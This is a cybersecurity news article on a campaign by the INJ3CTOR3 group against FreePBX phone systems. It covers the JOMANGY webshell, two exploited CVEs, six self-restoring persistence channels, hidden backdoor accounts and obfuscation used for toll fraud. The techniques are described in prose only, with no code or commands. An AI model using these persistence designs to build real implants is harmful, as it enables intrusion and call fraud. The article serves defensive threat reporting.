Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems

A hacker group known as INJ3CTOR3 has been running an active campaign against FreePBX systems, deploying a newly discovered PHP webshell called JOMANGY that uses six separate persistence layers to stay embedded on compromised servers.

The campaign targets internet-exposed VoIP phone systems and routes calls through them at the victims’ expense, a scheme known as toll fraud. With a target list of over 3,000 IP addresses, the operation is designed for mass automated exploitation.

FreePBX is an open-source interface used by businesses to manage phone systems built on Asterisk software. These setups handle real carrier accounts with SIP trunks that can originate actual phone calls.

For an attacker, gaining access means routing calls through premium-rate numbers they control and letting the victim’s carrier send the bill, with none of the overhead that comes with ransomware or data theft.

Analysts at Cyble (CRIL) identified the campaign and published a detailed report shared with Cyber Security News.

Researchers tied the operation to INJ3CTOR3 with high confidence, an actor that has targeted VoIP infrastructure for financial gain since at least 2019. Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026.

The Shadowserver Foundation tracked over 900 FreePBX hosts compromised during the January 2026 campaign wave.

By May 2026, more than 700 of those systems remained infected despite five months of public disclosure. That number reflects how genuinely difficult these infections are to clear, even after the original entry point has been patched.

Two vulnerabilities are the most likely entry points for the current campaign. CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module, while CVE-2025-57819 is a pre-authentication SQL injection bug in the FreePBX Endpoint module.

Both are patched in current FreePBX releases, though patching an already-infected host leaves the cron infrastructure running and the malware fully capable of re-establishing itself.

Hackers Use Six-Layer Persistence to Maintain Access

What sets this campaign apart is how its persistence was engineered. The six channels are not independent backups sitting in parallel.

Each one can reconstruct every other channel, making the infection genuinely self-healing. Clearing five of the six still hands the attacker a recovery window measured in minutes.

The first channel polls the attacker’s command-and-control server every one to three minutes via scheduled cron jobs, continuously re-downloading and re-executing the dropper.

The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files. The third stores eight immutable crontab copies in hidden directories, protected by a file attribute that silently blocks deletion even by root, backed by two separate restore loops.

The fourth is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear. The fifth plants webshell copies across more than twelve paths in the FreePBX web tree, many locked immutable, where a single authenticated request to any survivor rebuilds the full infection stack.

The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels.

Eighteen Hidden Accounts and Near-Zero Detection

The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL.

Account names like asterisk, freepbxuser, and spamfilter were deliberately chosen to blend into the legitimate account list administrators would expect to find.

JOMANGY had no prior public documentation before this analysis and uses double-layer obfuscation combining base64 encoding and ROT13 to defeat automated scanners.

At the time of research, the primary dropper had only four detections across 76 antivirus engines, while k.php and wr.php had zero.

Anyone dealing with a confirmed infection is advised to rebuild from a clean baseline, as leaving even one channel active gives the attacker enough leverage to restore the entire infection stack within minutes.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems appeared first on Cyber Security News.